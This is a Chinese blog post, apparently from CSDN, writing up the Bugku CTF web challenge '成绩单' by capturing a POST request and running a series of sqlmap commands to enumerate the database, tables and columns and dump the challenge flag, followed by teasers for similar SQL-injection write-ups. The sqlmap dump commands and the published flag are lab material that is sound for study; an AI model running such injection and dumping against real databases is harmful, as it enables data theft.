Bugku-WEB-成绩单(SQLMap注入)

最新推荐文章于 2022-12-03 20:58:02 发布
最新推荐文章于 2022-12-03 20:58:02 发布
阅读量8.5k 收藏 3
点赞数 3
分类专栏: # Bugku、XCTF-WEB类写题过程 文章标签: SQLMap WEB sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Onlyone_1314/article/details/89281722
版权

成绩单
链接:http://120.24.86.145:8002/chengjidan/
在这里插入图片描述

这个一看应该是SQL注入 先提交一个数据看看

在这里插入图片描述

发现有一个post数据 那就利用这个数据注入白

先抓包

在这里插入图片描述

然后点击action——>从copy to file

我保存在了 D盘Bugku.txt
在这里插入图片描述
先打开sqlmap,测试目标网址使用的数据库:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --current-d
在这里插入图片描述
得到当前使用数据库skctf_flag

之后爆数据库中的表:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --table -D “skctf_flag”
在这里插入图片描述
获得数据库中的表fl4g和sc,看来flag像是在fl4g中:

爆f14g的列:Sqlmap sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --column -T “fl4g” -D “skctf_flag”
在这里插入图片描述
得到表fl4g中的列skctf_flag。

继续爆列skctf_flag中的字段:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --dump -C “skctf_flag” -T “fl4g” -D “skctf_flag”
在这里插入图片描述
得到flag:BUGKU{Sql_INJECT0N_4813drd8hz4}

大灬白
关注
专栏目录
BugKuCTF(CTF-练习平台)——WEB-sql注入
Ifish的博客
02-25 3617
打开网址 注入题 修改id的值 发现只在id=1时显示,说明注入点应该是id=1 ‘闭合,发现不报错,尝试宽字节注入 报错 KEY{54f3320dc261f313ba712eb3f13a1f6d}...
CTF---Web---SQL注入---02---sqlmap常规模式
qq_22160557的博客
07-29 439
文章目录前言一、题目描述二、解题步骤1、id查询2、sqlmap跑URL总结 前言 题目分类: CTF—WebSQL注入—02—sqlmap常规模式 一、题目描述 题目:sql注入 链接:192.168.87.184 提示:order 二、解题步骤 1、id查询 Step1:根据id查询一下,url变成了 http://192.168.87.184/?order=id&button=submit 由链接可知,此为get传参。 2、sqlmap跑URL Step2:利用kali中的sqlma
BugkuCTF SQL注入1
weixin_34397291的博客
05-06 232
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 我们点开链接,里面有段这样的代码: //过滤sql $array = array('table','union','and','or','load_file','cre...
[bugku]sqlmap部分
ansu1440的博客
10-22 188
例题目录 [根据校赛的经验来看的话 这种登录的可以先用sqlmap搞一下....] 然后做一个新的web题目 可以先给自己预留5min看会不会解, 不要上来就翻答案n 就5min, 可以两个题,先做题,再补题。 其他的,在哪里学习可以换地方,早点起吧,不要让思维僵化了 例题1:这是一个神奇的登录框 sqlmap要结合burp一起使用;...
bugku--成绩查询
hxhabcd123的博客
08-28 1543
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
BugkuCTF web sql注入2
H4ppyD0g的博客
02-08 590
页面post方式提交表单; 所有按钮都不好用; f12检查看到action到login.php,访问一下,username和password都需要填写; 输入用户名直接提交提示用户名和密码都需要填写; 后台扫描没有结果; 经过一些列输入测试,判断admin就是用户名,但是密码不知道; 初步判断为post提交sql注入,'单引号验证一下 admin' -- # 判断应该就是这道题目就是考察的sql注...
CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用,两种方法一道题
最新发布
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3102
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
CTF---Web---SQL注入---01---万能密码+sqlmap
qq_22160557的博客
07-29 3727
文章目录前言一、题目描述二、解题步骤1. 万能密码登录2. sqlmap爆库3. 爆表4. 爆列5. 爆字段三、总结 前言 题目分类: CTF—WebSQL注入—01—万能密码+sqlmap 一、题目描述 题目:SQL注入 链接:192.168.87.172 二、解题步骤 1. 万能密码登录 Step1:尝试万能密码:user=‘=’,pass=‘=’,输入后登录成功,注入点在此 2. sqlmap爆库 Step2:源代码中提示,提交方法为POST,所以此题为sqlmap的post注入,采用kai
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入的盲注类型,并...
BUGKU WP-成绩查询
m0_55631425的博客
09-16 142
方法一:打开题目输入1,F12发现注入点为post传参 bp抓下包,把代码盘下来创一个文件在c盘,在文件夹里创建一个txt复制 然后启动我们的sqlmap,复制txt的绝对路径(也可以在bp中把包复制成txt放入sqlmap目录中)python sqlmap.py -r “C:\grades.bugku\1.txt” 连存在的注入类型也报出来了 –dbs 获取所有数据库 python sqlmap.py -r “C:\grades.bugku\1.txt” --dbs 获取skctf下的表 Sqlmap -
wp-Bugkuctf-web-38(sql注入)【附脚本】
bin789456的博客
08-23 2777
写在前面 本题提示是布尔注入,在之前的布尔注入中,一般是针对能否登录的布尔来进行信息获取,这里是利用username是否存在的布尔来进行信息获取,同时伴随着一些关键字过滤,对于布尔注入的进一步学习有一些帮助。 WP 首先弱密码尝试,显示 password error 更改后显示 username does not exist 这里就是一组布尔,存在与否 输一些关键字测试一下: and,or,=,' ' 看来有关键字屏蔽,并且大小写混用没啥用。 继续测试发现…还过滤了空格,逗号,等号,for 空格用括
SQL 登录注入脚本_[CTF]BugkuCTF - Web - sql注入2
weixin_39581972的博客
11-21 150
http://123.206.87.240:8007/web2/ 全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,%尝试进行SQL 注入,发现有过滤。判断过滤关键字符串。还是有很多关键字没有过滤的SQL 注入测试uname=admin说明用户名正确。uname=admin'^(length('ajest')!=5)^'此处可以考虑使用异或注入。uname=admin'^(uname!='a...
BugKusql注入
D-R0s1的博客
08-08 888
       今天和大家分享一道BugKu中关于sql注入的题目,在web题中,sql注入的相关知识可以说随处可见了,在这里咱们就就题论题不做其他的拓展和延伸了。        拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1'两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf' union sel...
BugKuCTF---sql注入Writeup
驻足
04-22 1488
我的博客 Marsguest’s BLog BugKuCTF—sql注入Writeup 原题地址 http://103.238.227.13:10083/ 首先构造链接 http://103.238.227.13:10083/?id=1' 发现存在过滤,页面没什么反应。右键源文件,发现编码规则GB-2312,猜测为mysql宽字节注入 简单讲解什么是宽字节注入: 1....
Bugku 成绩查询【WEB
soysauce123的博客
08-15 477
今天咱们尝试用一下一个新的工具,sqlmap,这是一个用于sql注入等等相关的一个很不错的工具。大家好,作为一个CTF方面的小白,以后我也希望每做一次题目就和大家分享分享自己的解题过程。我们都清楚http的请求方式有两种一个get,一个post,这里就是post。那现在这就是里面最后的文件里,【确信】flag肯定就在里面了打开他!然后这里我们是用登陆框的形式输入的,我们就可以想到post登陆框注入。看看找到了啥,四个库~~就我分析这个ctf就很显眼,我估计就是这个嘿嘿。然后就可以开始查询了,先搜索库。...
CTF/CTF练习平台-成绩查询【sqlmap post方法】
Sp4rkW的博客
08-30 5103
原题内容: 快来查查成绩吧 http://120.24.86.145:8002/chengjidan/ 学习资料: SQLMap中文参数用户手册 sqlmap WAF绕过/tamper详解 这题还是很基本的注入,首先手工尝试 延时五秒显示,结果是和只输入1一样,很明显,这是一个注入点,然后sleep既然是有效果的,不烦试一试sqlmap 这里用到了post方...
BUGKU CTF--web 基础{成绩查询}
lulu001128的博客
12-03 917
BUGKU CTF--web 基础{成绩查询}解题过程
bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)
LuckySec
11-29 552
题目 http://123.206.87.240:9001/sql/ 随便输入账号密码,然后打开burp进行拦截,并生成该页面的文件,保存到本地 然后使用sqlmap工具 构造相应语句 首先爆数据库 python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name --dbs ...
什么是SQL注入漏洞-SQLmap注入
05-21
SQL注入漏洞是一种常见的Web应用程序安全...SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序中的SQL注入漏洞。它通过发送各种恶意有效载荷来测试目标网站是否存在SQL注入漏洞,并自动获取目标数据库的信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值